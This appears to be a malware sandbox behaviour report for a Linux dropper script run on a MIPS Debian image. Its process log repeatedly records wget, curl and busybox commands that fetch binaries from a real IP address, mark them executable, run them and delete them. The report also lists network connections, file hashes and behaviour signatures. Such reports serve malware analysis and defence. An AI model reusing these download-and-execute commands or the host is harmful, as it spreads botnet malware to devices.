[curl -O http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/chmod
[chmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
[./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/rm
[rm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/usr/bin/wget
[wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/chmod
[chmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
[./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/rm
[rm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/chmod
[chmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
[./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/rm
[rm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/usr/bin/wget
[wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/chmod
[chmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
[./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/rm
[rm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/usr/bin/wget
[wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/chmod
[chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
[./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/rm
[rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/usr/bin/wget
[wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/chmod
[chmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
[./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/rm
[rm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/usr/bin/wget
[wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/chmod
[chmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
[./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/rm
[rm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/usr/bin/wget
[wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/chmod
[chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
[./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/rm
[rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/wget
[wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
Files
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/802-1-0xb66c0000-0xb66d1044-memory.dmp
memory/879-2-0xb66f5000-0xb6706044-memory.dmp
memory/916-3-0xb6726000-0xb6737044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-21 07:29
Reported
2024-11-21 07:31
Platform
debian9-mipsbe-20240729-en
Max time kernel
72s
Max time network
75s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | N/A |
| N/A | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | N/A |
| N/A | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | N/A |
| N/A | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | N/A |
| N/A | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | N/A |
| N/A | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | N/A |
| N/A | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | N/A |
| N/A | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | N/A |
| N/A | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | N/A |
| N/A | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | N/A |
| N/A | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | N/A |
| N/A | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | N/A |
| N/A | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | N/A |
| N/A | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | N/A |
| N/A | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | N/A |
| N/A | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | N/A |
| N/A | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | N/A |
| N/A | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | N/A |
| N/A | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | N/A |
| N/A | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | N/A |
| N/A | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | N/A |
| N/A | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | N/A |
| N/A | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | N/A |
| N/A | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | N/A |
| N/A | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | N/A |
| N/A | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | N/A |
| N/A | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | N/A |
| N/A | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | N/A |
| N/A | N/A | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /usr/bin/curl | N/A |
Processes
/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh
[/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/chmod
[chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
[./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/rm
[rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/wget
[wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/chmod
[chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
[./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/rm
[rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/usr/bin/wget
[wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/chmod
[chmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
[./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/rm
[rm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/usr/bin/wget
[wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/chmod
[chmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
[./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/rm
[rm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/usr/bin/wget
[wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/chmod
[chmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb
[./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/rm
[rm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/usr/bin/wget
[wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/chmod
[chmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe
[./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/rm
[rm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/usr/bin/wget
[wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/chmod
[chmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
[./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/rm
[rm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/usr/bin/wget
